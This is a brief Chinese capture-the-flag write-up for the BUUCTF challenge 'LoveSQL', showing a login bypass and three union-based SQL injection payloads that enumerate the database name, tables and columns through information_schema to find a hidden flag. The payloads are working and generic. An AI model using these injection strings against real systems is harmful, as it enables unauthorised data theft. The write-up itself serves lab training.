BUU10 [极客大挑战 2019]LoveSQL1

万能用户名(密码随便)

登录进去以后发现是这个东西,然而并没有什么卵用

然后就开始爆破数据库名字--表名--列名

注意:这道题需要将所有的表名都爆出来,需要在payload里头写 group_concat(),否则页面只会显示那个没有flag的假表名

1.1' union select 1,2,database() #

(爆出来数据库名字是 geek)

2.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

(爆出来geek库中的表名是geekuser(假的)和l0ve1ysq1)

3.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'#

(爆出来有id(永远都是1)和username和password还有flag)

这个题最大的坑在于flag藏在最终的password中,而必须要用group_concat()去显示完整的行,否则就看不见

相关推荐
庖丁解java33 分钟前
N个Utils
数据库
Mr. zhihao1 小时前
SQL LEFT JOIN 与 WHERE 条件的隐藏坑
数据库·sql
2301_793086871 小时前
Redis 04 Reactor
数据库·redis·缓存
Sais_Z1 小时前
ClickHouse的学习与了解
数据库·clickhouse
代码的余温2 小时前
MySQL性能优化:10个关键参数调整指南
数据库·mysql·性能优化
silver98862 小时前
sql链接的url中serverTimezone的作用
数据库·sql
tanxiaomi3 小时前
数据库索引视角:对比二叉树到红黑树再到B树
数据结构·数据库·b树
水无痕simon3 小时前
5 索引的操作
数据库·elasticsearch
柏油4 小时前
可视化 MySQL binlog 监听方案
数据库·后端·mysql